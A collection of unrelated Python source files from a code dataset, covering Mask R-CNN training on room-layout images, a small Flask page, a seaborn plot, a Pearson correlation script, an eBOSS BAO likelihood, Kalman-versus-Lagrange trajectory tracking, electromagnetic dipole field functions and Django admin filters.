We can put multiple images on each\n # GPU because the images are small. Batch size is 4 (GPUs * images/GPU).\n GPU_COUNT = len(os.environ['CUDA_VISIBLE_DEVICES'].split(','))\n IMAGES_PER_GPU = 8\n\n # Number of classes (including background)\n NUM_CLASSES = 1 + 11 # background + layouts\n\n # Use small images for faster training. Set the limits of the small side\n # the large side, and that determines the image shape.\n IMAGE_MIN_DIM = 128\n IMAGE_MAX_DIM = 128\n\n # Use smaller anchors because our image and objects are small\n RPN_ANCHOR_SCALES = (8, 16, 32, 64, 128) # anchor side in pixels\n\n # Reduce training ROIs per image because the images are small and have\n # few objects. Aim to allow ROI sampling to pick 33% positive ROIs.\n TRAIN_ROIS_PER_IMAGE = 32\n\n # Use a small epoch since the data is simple\n STEPS_PER_EPOCH = 100\n\n # use small validation steps since the epoch is small\n VALIDATION_STEPS = 5\n\nconfig = ShapesConfig()\nconfig.display()\n\n\nclass LayoutDataset(utils.Dataset):\n\n #load .mat layout information files:\n training_layout_info = {}\n validation_layout_info = {}\n training_mat = scipy.io.loadmat('layout/training.mat')\n for i in training_mat['training'].flatten():\n training_layout_info.update({i['image'][0]:{'scene':i['scene'][0],'type':i['type'][0][0],'point':i['point'],'resolution':i['resolution'][0]}})\n validation_mat = scipy.io.loadmat('layout/validation.mat')\n for i in validation_mat['validation'].flatten():\n validation_layout_info.update({i['image'][0]:{'scene':i['scene'][0],'type':i['type'][0][0],'point':i['point'],'resolution':i['resolution'][0]}})\n training_img_name_list = []\n validation_img_name_list = []\n test_img_name_list = []\n for i in os.listdir('layout/images'):\n if i[:-4] in training_layout_info.keys():\n training_img_name_list.append(i[:-4])\n elif i[:-4] in validation_layout_info.keys():\n validation_img_name_list.append(i[:-4])\n else: test_img_name_list.append(i[:-4])\n\n #set mask point size\n mask_point_size = 20\n\n def load_layouts(self,type):\n #11 kinds of layouts\n self.add_class(\"layouts\", 1, \"type0\")\n self.add_class(\"layouts\", 2, \"type1\")\n self.add_class(\"layouts\", 3, \"type2\")\n self.add_class(\"layouts\", 4, \"type3\")\n self.add_class(\"layouts\", 5, \"type4\")\n self.add_class(\"layouts\", 6, \"type5\")\n self.add_class(\"layouts\", 7, \"type6\")\n self.add_class(\"layouts\", 8, \"type7\")\n self.add_class(\"layouts\", 9, \"type8\")\n self.add_class(\"layouts\", 10, \"type9\")\n self.add_class(\"layouts\", 11, \"type10\")\n if type == 'training':\n for img_id in range(len(self.training_img_name_list)):\n img_name = self.training_img_name_list[img_id]\n img_info = self.get_info(img_name)\n self.add_image(\"layouts\", image_id=img_id, path=\n 'layout/images/'+img_name+'.jpg',\n name=img_name, scene=img_info['scene'],\n point=img_info['point'],\n resolution=img_info['resolution'],\n type=img_info['type'])\n else:\n for img_id in range(len(self.validation_img_name_list)):\n img_name = self.validation_img_name_list[img_id]\n img_info = self.get_info(img_name)\n self.add_image(\"layouts\", image_id=img_id, path=\n 'layout/images/'+img_name+'.jpg',\n name=img_name, scene=img_info['scene'],\n point=img_info['point'],\n resolution=img_info['resolution'],\n type=img_info['type'])\n\n def get_info(self, image_name):\n \"\"\"Input image_id, output layout info\"\"\"\n if image_name in self.validation_layout_info.keys():\n return self.validation_layout_info[image_name]\n elif image_name in 
self.training_layout_info.keys():\n return self.training_layout_info[image_name]\n else:\n print(\"image name doesn't exist\")\n return False\n\n def image_reference(self, image_id):\n \"\"\"Return the layouts data of the image.\"\"\"\n return self.image_info[image_id]\n\n def load_mask(self, image_id):\n info = self.image_info[image_id]\n class_ids = np.array([info['type'] + 1], dtype=np.int32)\n mask = np.resize(np.array([([0]*info['resolution'][1]) for i in range(info['resolution'][0])], dtype=np.uint8),(info['resolution'][0],info['resolution'][1],1))\n for point in info['point']:\n mask[max(0,int(point[1]-0.5)-int(self.mask_point_size/2)):\n min(info['resolution'][0],int(point[1]-0.5)+int(self.mask_point_size/2)),\n max(0,int(point[0]-0.5)-int(self.mask_point_size/2)):\n min(info['resolution'][1],int(point[0]-0.5)+int(self.mask_point_size/2)),0] = 1\n return mask, class_ids\n\n\ndataset_train = LayoutDataset()\ndataset_train.load_layouts('training')\ndataset_train.prepare()\ndataset_val = LayoutDataset()\ndataset_val.load_layouts('validation')\ndataset_val.prepare()\nmodel = modellib.MaskRCNN(mode=\"training\", config=config,\n model_dir=MODEL_DIR)\n\n# Which weights to start with?\ninit_with = \"last\" # imagenet, coco, or last\n\nif init_with == \"imagenet\":\n model.load_weights(model.get_imagenet_weights(), by_name=True)\nelif init_with == \"coco\":\n # Load weights trained on MS COCO, but skip layers that\n # are different due to the different number of classes\n # See README for instructions to download the COCO weights\n model.load_weights(COCO_MODEL_PATH, by_name=True,\n exclude=[\"mrcnn_class_logits\", \"mrcnn_bbox_fc\",\n \"mrcnn_bbox\", \"mrcnn_mask\"])\nelif init_with == \"last\":\n # Load the last model you trained and continue training\n model.load_weights(model.find_last()[1], by_name=True)\n\n#image_ids = np.random.choice(dataset_train.image_ids, 4)\n#for image_id in image_ids:\n# image = dataset_train.load_image(image_id)\n# mask, class_ids = dataset_train.load_mask(image_id)\n# visualize.display_top_masks(image, mask, class_ids, dataset_train.class_names)\n\n# Train the head branches\n# Passing layers=\"heads\" freezes all layers except the head\n# layers. 
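For reference, load_mask above turns each annotated layout point into a small square stamp in a binary mask, clamping the window at the image borders. A standalone numpy sketch of the same construction (function name and the demo point are assumptions):

```python
import numpy as np

def points_to_mask(points, height, width, size=20):
    # One-channel uint8 mask, as in load_mask above.
    mask = np.zeros((height, width, 1), dtype=np.uint8)
    half = size // 2
    for x, y in points:                 # points are (x, y); rows come from y
        r, c = int(y - 0.5), int(x - 0.5)
        mask[max(0, r - half):min(height, r + half),
             max(0, c - half):min(width, c + half), 0] = 1
    return mask

m = points_to_mask([(30.5, 40.5)], 128, 128)
print(m.sum())  # 400: a full 20x20 stamp well inside the image
```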
You can also pass a regular expression to select\n# which layers to train by name pattern.\nmodel.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE,\n epochs=1,\n layers='heads')\n\nmodel.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE / 10,\n epochs=2,\n layers=\"all\")\n","sub_path":"kpd_last.py","file_name":"kpd_last.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"53762142","text":"from flask import Flask, render_template\nfrom day10.mydao_emp import DaoEmp\n\napp = Flask(__name__)\n \n@app.route('/emp')\ndef emp():\n de = DaoEmp()\n list = de.selectlist()\n return render_template('emp.html', list=list)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"HELLOPYTHON/day10/myflask06_crud.py","file_name":"myflask06_crud.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"368860970","text":"import seaborn as sns\nimport matplotlib.pyplot as plt\n\ntips = sns.load_dataset('tips')\ntips.head()\nsns.set_style('whitegrid')\nplt.figure(figsize = (12, 3))\nsns.countplot(x = 'sex', data = tips)\n\n\n\n\n","sub_path":"Python for Data Science and Machine Learning Bootcamp/Seaborn/Style and Color.py","file_name":"Style and Color.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"22535536","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\nrealUtility = np.loadtxt(\"D:\\document\\javaworkspace\\genetic\\GrealUtility.txt\")\npredictUtility = np.loadtxt(\"D:\\document\\javaworkspace\\genetic\\GpreUtility.txt\")\nmolecular = 0.0\ndenominator1 = 0.0\ndenominator2 = 0.0\ndenominator = 0.0\nfor i in range(len(realUtility)):\n molecular += (realUtility[i]-realUtility.mean()) * (predictUtility[i]-predictUtility.mean())\n denominator1 += np.square((realUtility[i]-realUtility.mean()))\n denominator2 += np.square((predictUtility[i]-predictUtility.mean()))\n \ndenominator = np.sqrt(denominator1*denominator2)\nperson = molecular/denominator\nprint(person) ","sub_path":"DrawGraph/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"411010937","text":"import os\nimport numpy as np\nimport warnings\nimport montepython.io_mp as io_mp\nfrom montepython.likelihood_class import Likelihood\nimport scipy.constants as conts\nfrom scipy import interpolate as itp\nfrom scipy.interpolate import RectBivariateSpline\n\nclass bao_eBOSS_DR16_gal_QSO(Likelihood):\n\n # initialization routine\n\n def __init__(self, path, data, command_line):\n\n Likelihood.__init__(self, path, data, command_line)\n\n # are there conflicting experiments?\n conflicting_experiments = [\n 'bao', 'bao_boss', 'bao_known_rs', 'bao_angular',\n 'bao_boss_aniso', 'bao_boss_aniso_gauss_approx',\n 'bao_boss_dr12', 'bao_fs_boss_dr12', 'bao_fs_boss_dr12_twobins',\n 'bao_fs_eBOSS_DR16_QSO', 'bao_fs_eBOSS_DR16_LRG']\n for experiment in conflicting_experiments:\n if experiment in data.experiments:\n raise io_mp.LikelihoodError(\n 'bao_eBOSS_DR16_gal_QSO reports conflicting BAO measurments from: %s' %(experiment))\n\n # define arrays for values of z and data points DM/r_s and DH/r_s.\n self.z = np.array([], 'float64')\n self.DM_over_rs = np.array([], 'float64')\n self.DH_over_rs = 
np.array([], 'float64')\n\n # Counting the number of data point\n # in LRG dr16 and QSO.\n lrg_dr16_points = 0\n qso_dr16_points = 0\n\n # Loadind the data depending on the datasets asked in the param file.\n # By defualt all the datasets are loaded.\n if self.lrg_dr12:\n print(\"BOSS LRG DR12 = \" + str(self.lrg_dr12))\n with open(os.path.join(self.data_directory, self.lrg_dr12_data_file), 'r') as filein:\n for i, line in enumerate(filein):\n if line.strip() and line.find('#') == -1:\n this_line = line.split()\n # load redshifts\n self.z = np.append(self.z, float(this_line[0]))\n # load D_M / rs\n if this_line[2] == 'DM_over_rs':\n self.DM_over_rs = np.append(\n self.DM_over_rs, float(this_line[1]))\n # load D_H/rs\n elif this_line[2] == 'DH_over_rs':\n self.DH_over_rs = np.append(\n self.DH_over_rs, float(this_line[1]))\n\n lrg_dr12_points = i\n if self.lrg_dr16:\n print(\"eBOSS LRG DR16 = \" + str(self.lrg_dr16))\n with open(os.path.join(self.data_directory, self.lrg_dr16_data_file), 'r') as filein:\n for i, line in enumerate(filein):\n if line.strip() and line.find('#') == -1:\n this_line = line.split()\n # load redshifts\n self.z = np.append(self.z, float(this_line[0]))\n # load and D_M / rs\n if this_line[2] == 'DM_over_rs':\n self.DM_over_rs = np.append(\n self.DM_over_rs, float(this_line[1]))\n # load D_H/rs\n elif this_line[2] == 'DH_over_rs':\n self.DH_over_rs = np.append(\n self.DH_over_rs, float(this_line[1]))\n # Counting the total number of datasets in LRG DR16 dataset. Important to set\n # the covariance matrix in the right order.\n lrg_dr16_points = i\n if self.qso_dr16:\n print(\"eBOSS QSO = \" + str(self.qso_dr16))\n if ('sdssdr16_lyauto') in data.experiments:\n if not 'sdssdr16_lyaxqso' in data.experiments:\n print(\"If you include QSO dataset in the 'sdssdr16_gal_qso' AND ly-alpha autocorrelation,\" +\n \"we highly recommend to take into account the crosscorrelation of the two dataset i.e. \" +\n \"include also the likelihood sdssdr16_lyaxqso likelihood.\")\n\n with open(os.path.join(self.data_directory, self.qso_data_file), 'r') as filein:\n for i, line in enumerate(filein):\n if line.strip() and line.find('#') == -1:\n this_line = line.split()\n # load redshift\n self.z = np.append(self.z, float(this_line[0]))\n # load D_M / rs\n if this_line[2] == 'DM_over_rs':\n self.DM_over_rs = np.append(\n self.DM_over_rs, float(this_line[1]))\n # load D_H/rs\n elif this_line[2] == 'DH_over_rs':\n self.DH_over_rs = np.append(\n self.DH_over_rs, float(this_line[1]))\n # Counting the total number of datasets in QSO datasets. 
Important to set\n # the covariance matrix in the right order.\n qso_dr16_points = i\n # Pick out the unique redshifts from the datafiles.\n self.z = np.unique(self.z)\n # Number of bins\n self.num_bins = np.shape(self.z)[0]\n # Number of data points\n self.num_points = 2*self.num_bins\n\n # Read covariance matrix and set them according to the chosen dataset\n self.cov_data = np.zeros((self.num_points,self.num_points), 'float64')\n if self.lrg_dr12:\n self.cov_data = np.loadtxt(os.path.join(self.data_directory, self.lrg_dr12_cov_file))\n if self.lrg_dr16:\n # Check if LRG DR12 covariance has already been loaded in the covaraince matrix...\n if np.all(self.cov_data == 0):\n # If not, load the LRG DR16 dataset.\n self.cov_data = np.loadtxt(os.path.join(self.data_directory, self.lrg_dr16_cov_file))\n else:\n # If LRG DR12 covariance matrix alreadt exists then change the size of the covariance matrix\n # and then add the LRG DR16 coavariance matrix along the digonal with LRG DR12.\n cov_data_Temp = self.cov_data\n self.cov_data = np.zeros((np.shape(cov_data_Temp)[0] +\n (lrg_dr16_points + 1), np.shape(cov_data_Temp)[0]\n + (lrg_dr16_points + 1)))\n self.cov_data[0:np.shape(cov_data_Temp)[0],0:np.shape(cov_data_Temp)[0]] = cov_data_Temp\n self.cov_data[np.shape(cov_data_Temp)[0]:np.shape(cov_data_Temp)[0] +\n (lrg_dr16_points + 1),np.shape(cov_data_Temp)[0]:np.shape(cov_data_Temp)[0] +\n (lrg_dr16_points + 1)] = np.loadtxt(os.path.join(self.data_directory, self.lrg_dr16_cov_file))\n # Same as above but for QSO covariance matrix. Check, read and adjust the covariance matrix.\n if self.qso_dr16:\n if np.all(self.cov_data == 0):\n self.cov_data = np.loadtxt(os.path.join(self.data_directory, self.qso_cov_file))\n else:\n cov_data_Temp = self.cov_data\n self.cov_data = np.zeros((np.shape(cov_data_Temp)[0] +\n (qso_dr16_points + 1), np.shape(cov_data_Temp)[0]\n + (qso_dr16_points + 1)))\n self.cov_data[0:np.shape(cov_data_Temp)[0],0:np.shape(cov_data_Temp)[0]] = cov_data_Temp\n self.cov_data[np.shape(cov_data_Temp)[0]:np.shape(cov_data_Temp)[0] +\n (qso_dr16_points + 1),np.shape(cov_data_Temp)[0]:np.shape(cov_data_Temp)[0] +\n (qso_dr16_points + 1)] = np.loadtxt(os.path.join(self.data_directory, self.qso_cov_file))\n\n # compute likelihood\n def loglkl(self, cosmo, data):\n loglkl = 0.0\n\n # define array for values of D_M_diff = D_M^th - D_M^obs and H_diff = H^th - H^obs,\n # ordered by redshift bin (z=[0.38, 0.51, 0.61]) as following:\n # data_array = [DM_diff(z=0.38), H_diff(z=0.38), DM_diff(z=0.51), .., .., ..]\n data_array = np.array([], 'float64')\n # for each point, compute comoving angular diameter distance D_M = (1 + z) * D_A,\n # sound horizon at baryon drag rs_d, theoretical prediction\n for i in range(self.num_bins):\n DM_at_z = cosmo.angular_distance(self.z[i]) * (1. 
+ self.z[i])\n            H_at_z = cosmo.Hubble(self.z[i])\n            DH_at_z = 1.0/H_at_z\n            rd = cosmo.rs_drag() * self.rs_rescale\n\n            theo_DM_at_z = DM_at_z / rd\n            theo_DH_at_z_in_Mpc_inv = DH_at_z / rd\n\n            # calculate difference between the sampled point and observations\n            DM_diff = theo_DM_at_z - self.DM_over_rs[i]\n            H_diff = theo_DH_at_z_in_Mpc_inv - self.DH_over_rs[i]\n\n            # save to data array\n            data_array = np.append(data_array, DM_diff)\n            data_array = np.append(data_array, H_diff)\n\n        # compute chi squared\n        inv_cov_data = np.linalg.inv(self.cov_data)\n        chi2 = np.dot(np.dot(data_array,inv_cov_data),data_array)\n\n        # return ln(L)\n        loglkl = - 0.5 * chi2\n\n        return loglkl\n","sub_path":"montepython/likelihoods/bao_eBOSS_DR16_gal_QSO/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"48830729","text":"import numpy as np\nfrom math import *\nfrom tqdm import tqdm\n\n#Lagrange interpolation\ndef lagrange(x,xx,yy):\n    '''Performs Lagrange interpolation to find polynomial fit for measurements.\n\n    x : Current x to compute interpolation for.\n    xx : Array of x measurements.\n    yy : Array of y measurements.'''\n\n    output=0\n    for k in range(xx.shape[0]):\n        lk=1\n        for j in range(xx.shape[0]):\n            if j!=k:\n                lk = lk*(x-xx[j])/(xx[k]-xx[j])\n        output += yy[k]*lk\n    return output\n\n#Kalman filtering\ndef kalman_update(x, P, F, B, u, Q, measurement, z, R, H):\n    '''Performs one step of Kalman filter update (with measurements if provided).\n\n    x : Current state estimate vector.\n    P : Current state covariance matrix.\n    F : State transition matrix.\n    B : Control matrix.\n    u : Control vector.\n    Q : State uncertainty matrix.\n    z : Current measured state vector.\n    R : Measured state uncertainty matrix.\n    H : Mapping matrix from states to measurements (not needed).'''\n\n    assert x.shape == (6,1)\n    assert P.shape == (6,6)\n    assert F.shape == (6,6)\n\n    xhat = np.matmul(F, x) + np.matmul(B, u)\n    Phat = np.matmul(F, np.matmul(P, F.T)) + Q\n\n    if measurement==0:\n        return xhat, Phat\n\n    else:\n        # The gain and posterior covariance must be formed from the predicted\n        # covariance Phat, not the prior P.\n        Kprime = np.matmul(Phat, np.matmul(H.T, np.linalg.inv(np.matmul(H, np.matmul(Phat, H.T)) + R)))\n        xhatprime = xhat + np.matmul(Kprime, z - np.matmul(H, xhat))\n        Phatprime = Phat - np.matmul(Kprime, np.matmul(H, Phat))\n\n        return xhatprime, Phatprime\n\ndef solve(measurements, measurements_uncertainty, measurements_idx, initx, initP, F, B, u, Q, N, H=np.eye(6)):\n    '''Returns the state estimations given measurements and state dynamics.\n\n    measurements : Matrix where each row is the state measurements. 0 if not available.\n    measurements_uncertainty : Measurement uncertainties. 
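For reference, kalman_update above follows the textbook Kalman recursion; the in-place fix replaces the prior covariance P with the predicted Phat in the gain and posterior update, matching these equations:

```latex
\begin{aligned}
\hat{x}_{k|k-1} &= F\,\hat{x}_{k-1|k-1} + B\,u, \qquad
P_{k|k-1} = F\,P_{k-1|k-1}\,F^{\top} + Q,\\
K_k &= P_{k|k-1} H^{\top}\bigl(H P_{k|k-1} H^{\top} + R\bigr)^{-1},\\
\hat{x}_{k|k} &= \hat{x}_{k|k-1} + K_k\bigl(z_k - H\,\hat{x}_{k|k-1}\bigr), \qquad
P_{k|k} = P_{k|k-1} - K_k H P_{k|k-1}.
\end{aligned}
```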
0 if not available.\n measurements_idx : Length N array holding 1 if that time index has a measurement.\n initx : Mean for states estimate at time 0.\n initP : Covariance for states estimate at time 0.\n F : State transition matrix.\n B : Control matrix.\n u : Control vector.\n Q : State uncertainty matrix.\n N : Number of time indices.\n H : Mapping matrix from states to measurements (not needed).'''\n\n x_sol = [initx]\n P_sol = [initP]\n\n for k in range(N):\n x_now, P_now = kalman_update(x_sol[-1].reshape(-1,1), P_sol[-1], F, B, u, Q, \\\n measurements_idx[k], measurements[k].reshape(-1,1), measurements_uncertainty, H)\n\n x_sol.append(x_now.flatten())\n P_sol.append(P_now)\n\n return np.array(x_sol), np.array(P_sol)\n\ndef generate_data(xinit, vinit, delta, N, prop, noise):\n '''Generate true and noisy 3D data.\n\n xinit : 3D array of initial x,y,z positions.\n vinit : 3D array of initial x,y,z velocities.\n delta : Time delta.\n N : Number of time indices to consider.\n prop : Proportion of N, indicates how many noisy measurements to generate.\n noise : Variance of added noise.'''\n\n x = [xinit[0]]\n y = [xinit[1]]\n z = [xinit[2]]\n velx = [vinit[0]]\n vely = [vinit[1]]\n velz = [vinit[2]]\n idx = np.zeros(N)\n\n for k in range(N):\n x.append(x[-1] + velx[-1]*delta)\n y.append(y[-1] + vely[-1]*delta)\n z.append(z[-1] + velz[-1]*delta - 0.5*9.81*delta**2)\n velx.append(velx[-1])\n vely.append(vely[-1])\n velz.append(velz[-1] - 9.81*delta)\n if k % int(prop*N) == 0:\n idx[k] = 1\n\n actual = np.vstack((np.array(x),np.array(y),np.array(z),np.array(velx),np.array(vely),np.array(velz)))\n noisy = actual.T + noise*np.random.randn(N+1, 6)\n\n return idx, actual.T, noisy\n\n\n# Initialisations\nxinit = np.array([0,0,0])\nvinit = np.array([100,100,100])\ndelta = 0.1\nN = 204\nprop = 0.1\nnoise = 10\nstate_unc = 40\n\n# Matrices for kalman updates\nF = np.array([[1,0,0,delta,0,0],\n [0,1,0,0,delta,0],\n [0,0,1,0,0,delta],\n [0,0,0,1,0,0],\n [0,0,0,0,1,0],\n [0,0,0,0,0,1]])\n\nB = np.array([0,0,0.5*delta**2,0,0,delta]).reshape(-1,1)\nu = np.array([-9.81]).reshape(-1,1)\n\n#### GET MSEs ####\n\nnum_trials = 1000\nlagrange_results = []\nkalman_results = []\n\nfor n in tqdm(range(num_trials)):\n measurements_idx, actual, measurements = generate_data(xinit, vinit, delta, N, prop, noise)\n\n #Lagrange\n yy=np.array([lagrange(x,measurements[1:][measurements_idx==1][:,0],\\\n measurements[1:][measurements_idx==1][:,2]) for x in actual[:, 0]])\n lagrange_results.append(np.mean((yy-actual[:, 2])**2))\n\n #Kalman\n x, P = solve(measurements, noise*np.eye(6), measurements_idx, np.array([0,0,0,100,100,100]), \\\n np.eye(6), F, B, u, state_unc*np.eye(6), N, H=np.eye(6))\n kalman_results.append(np.mean((x[:, 2]-actual[:, 2])**2))\n\nprint('Lagrange MSEs mean : ', np.mean(lagrange_results))\nprint('Lagrange MSEs std : ', np.std(lagrange_results))\nprint('Kalman MSEs mean : ', np.mean(kalman_results))\nprint('Kalman MSEs std : ', np.std(kalman_results))\n","sub_path":"tracking_comp.py","file_name":"tracking_comp.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"240692330","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom .base import BaseElectricDipole, BaseFDEM\n\nfrom scipy.constants import mu_0, pi, epsilon_0\nimport numpy as np\nimport warnings\n\n\nclass 
ElectricDipole_WholeSpace(BaseElectricDipole, BaseFDEM):\n\n def electric_field(self, xyz, **kwargs):\n pass\n\n\ndef E_from_EDWS(XYZ, srcLoc, sig, f, current=1., length=1., orientation='X', kappa=0., epsr=1., t=0.):\n \"\"\"E_from_EDWS\n Computing the analytic electric fields (E) from an electrical dipole in a wholespace\n - You have the option of computing E for multiple frequencies at a single reciever location\n or a single frequency at multiple locations\n\n :param numpy.array XYZ: reciever locations at which to evaluate E\n :param float epsr: relative permitivitty value (unitless), default is 1.0\n :rtype: numpy.array\n :return: Ex, Ey, Ez: arrays containing all 3 components of E evaluated at the specified locations and frequencies.\n \"\"\"\n\n mu = mu_0*(1+kappa)\n epsilon = epsilon_0*epsr\n sig_hat = sig + 1j*omega(f)*epsilon\n\n XYZ = Utils.asArray_N_x_Dim(XYZ, 3)\n # Check\n if XYZ.shape[0] > 1 & f.shape[0] > 1:\n raise Exception('I/O type error: For multiple field locations only a single frequency can be specified.')\n\n dx = XYZ[:, 0] - srcLoc[0]\n dy = XYZ[:, 1] - srcLoc[1]\n dz = XYZ[:, 2] - srcLoc[2]\n\n r = np.sqrt(dx**2. + dy**2. + dz**2.)\n # k = np.sqrt( -1j*2.*pi*f*mu*sig )\n k = np.sqrt(omega(f)**2. * mu * epsilon - 1j * omega(f) * mu * sig)\n\n front = current * length / (4.*pi*sig_hat* r**3) * np.exp(-1j*k*r)\n mid = -k**2 * r**2 + 3*1j*k*r + 3\n\n if orientation.upper() == 'X':\n Ex = front*((dx**2 / r**2)*mid + (k**2 * r**2 -1j*k*r-1.))\n Ey = front*(dx*dy / r**2)*mid\n Ez = front*(dx*dz / r**2)*mid\n return Ex, Ey, Ez\n\n elif orientation.upper() == 'Y':\n # x--> y, y--> z, z-->x\n Ey = front*((dy**2 / r**2)*mid + (k**2 * r**2 -1j*k*r-1.))\n Ez = front*(dy*dz / r**2)*mid\n Ex = front*(dy*dx / r**2)*mid\n return Ex, Ey, Ez\n\n elif orientation.upper() == 'Z':\n # x --> z, y --> x, z --> y\n Ez = front*((dz**2 / r**2)*mid + (k**2 * r**2 -1j*k*r-1.))\n Ex = front*(dz*dx / r**2)*mid\n Ey = front*(dz*dy / r**2)*mid\n return Ex, Ey, Ez\n\n\ndef MagneticDipoleFields(srcLoc, obsLoc, component, orientation='Z', moment=1., mu=mu_0):\n \"\"\"\n Calculate the vector potential of a set of magnetic dipoles\n at given locations 'ref. '\n\n .. math::\n\n B = \\frac{\\mu_0}{4 \\pi r^3} \\left( \\frac{3 \\vec{r} (\\vec{m} \\cdot\n \\vec{r})}{r^2})\n - \\vec{m}\n \\right) \\cdot{\\hat{rx}}\n\n :param numpy.ndarray srcLoc: Location of the source(s) (x, y, z)\n :param numpy.ndarray obsLoc: Where the potentials will be calculated\n (x, y, z)\n :param str component: The component to calculate - 'x', 'y', or 'z'\n :param numpy.ndarray moment: The vector dipole moment (vertical)\n :rtype: numpy.ndarray\n :return: The vector potential each dipole at each observation location\n \"\"\"\n\n if isinstance(orientation, str):\n assert orientation.upper() in ['X', 'Y', 'Z'], (\n \"orientation must be 'x', 'y', or 'z' or a vector not {}\"\n .format(orientation)\n )\n elif (not np.allclose(np.r_[1., 0., 0.], orientation) or\n not np.allclose(np.r_[0., 1., 0.], orientation) or\n not np.allclose(np.r_[0., 0., 1.], orientation)):\n warnings.warn(\n 'Arbitrary trasnmitter orientations ({}) not thouroughly tested '\n 'Pull request on a test anyone? 
bueller?'.format(orientation)\n )\n\n if isinstance(component, str):\n assert component.upper() in ['X', 'Y', 'Z'], (\n \"component must be 'x', 'y', or 'z' or a vector not {}\"\n .format(component)\n )\n elif (not np.allclose(np.r_[1., 0., 0.], component) or\n not np.allclose(np.r_[0., 1., 0.], component) or\n not np.allclose(np.r_[0., 0., 1.], component)):\n warnings.warn(\n 'Arbitrary receiver orientations ({}) not thouroughly tested '\n 'Pull request on a test anyone? bueller?'\n ).format(component)\n\n if isinstance(orientation, str):\n orientation = orientationDict[orientation.upper()]\n\n if isinstance(component, str):\n component = orientationDict[component.upper()]\n\n assert np.linalg.norm(orientation, 2) == 1., (\n \"orientation must be a unit vector. \"\n \"Use 'moment=X to scale source fields\"\n )\n\n if np.linalg.norm(component, 2) != 1.:\n warnings.warn(\n 'The magnitude of the receiver component vector is > 1, '\n ' it is {}. The receiver fields will be scaled.'\n .format(np.linalg.norm(component, 2))\n )\n\n srcLoc = np.atleast_2d(srcLoc)\n component = np.atleast_2d(component)\n obsLoc = np.atleast_2d(obsLoc)\n orientation = np.atleast_2d(orientation)\n\n nObs = obsLoc.shape[0]\n nSrc = int(srcLoc.size / 3.)\n\n # use outer product to construct an array of [x_src, y_src, z_src]\n\n m = moment*orientation.repeat(nObs, axis=0)\n B = []\n\n for i in range(nSrc):\n srcLoc = srcLoc[i, np.newaxis].repeat(nObs, axis=0)\n rx = component.repeat(nObs, axis=0)\n dR = obsLoc - srcLoc\n r = np.sqrt((dR**2).sum(axis=1))\n\n # mult each element and sum along the axis (vector dot product)\n m_dot_dR_div_r2 = (m * dR).sum(axis=1) / (r**2)\n\n # multiply the scalar m_dot_dR by the 3D vector r\n rvec_m_dot_dR_div_r2 = np.vstack([m_dot_dR_div_r2 * dR[:, i] for\n i in range(3)]).T\n inside = (3. 
* rvec_m_dot_dR_div_r2) - m\n\n # dot product with rx orientation\n inside_dot_rx = (inside * rx).sum(axis=1)\n front = (mu/(4.* pi * r**3))\n\n B.append(Utils.mkvc(front * inside_dot_rx))\n\n return np.vstack(B).T\n","sub_path":"geoana/em/fdem.py","file_name":"fdem.py","file_ext":"py","file_size_in_byte":6313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"593989183","text":"# encoding: utf-8\r\n\r\nfrom django.db import models\r\nfrom django.contrib.admin.filterspecs import FilterSpec, ChoicesFilterSpec, RelatedFilterSpec\r\nfrom django.utils.encoding import smart_unicode\r\nfrom django.utils.translation import ugettext as _\r\n\r\n\r\n\r\nclass CategoryAdminFilter(FilterSpec):\r\n def __init__(self, f, request, params, model, model_admin, field_path=None):\r\n self.lookup_val = request.GET.get('parent', None)\r\n self.field = f\r\n\r\n self.lookup_choices = model.objects.filter(parent__id=self.lookup_val)\r\n\r\n def get_query_set(self, cl, qs):\r\n if self.lookup_val:\r\n qs = qs.filter(parent__id=self.lookup_val)\r\n \r\n return qs\r\n\r\n def choices(self, cl):\r\n yield {'selected': self.lookup_val is None,\r\n 'query_string': cl.get_query_string({}, [self.field.name]),\r\n 'display': _('All')}\r\n\r\n if len(self.lookup_choices) > 0:\r\n for choice in self.lookup_choices:\r\n yield {'selected': self.lookup_val == choice.id,\r\n 'query_string': cl.get_query_string({self.field.name: choice.id}),\r\n 'display': \"%s %s\" % (smart_unicode(choice), \" (\" + smart_unicode(choice.category_set.count()) + \")\")\r\n }\r\n\r\n\r\n'''\r\nUrun provider_stock_code a gore filtreleme\r\nbu alan dolu ise urun manuel eklenmemis xml den eklenmistir.\r\n'''\r\nclass ProductAdminFilter(FilterSpec):\r\n def __init__(self, f, request, params, model, model_admin, field_path=None):\r\n self.lookup_val = request.GET.get('provider_stock_code__isnull', None)\r\n self.field = f\r\n\r\n def choices(self, cl):\r\n yield {'selected': self.lookup_val is None,\r\n 'query_string': cl.get_query_string({}, [self.field.name]),\r\n 'display': _('All')\r\n }\r\n \r\n yield {'selected': self.lookup_val == 'True',\r\n 'query_string': cl.get_query_string({'provider_stock_code__isnull': True}, [self.field.name]),\r\n 'display': _('Yes')\r\n }\r\n \r\n yield {'selected': self.lookup_val == 'False',\r\n 'query_string': cl.get_query_string({'provider_stock_code__isnull': False}, [self.field.name]),\r\n 'display': _('No')\r\n }\r\n\r\n def title(self):\r\n return \"Manuel Eklenenler\"\r\n\r\n\r\n\r\nFilterSpec.filter_specs.insert(1, (lambda f: getattr(f, 'product_admin_filter', False), 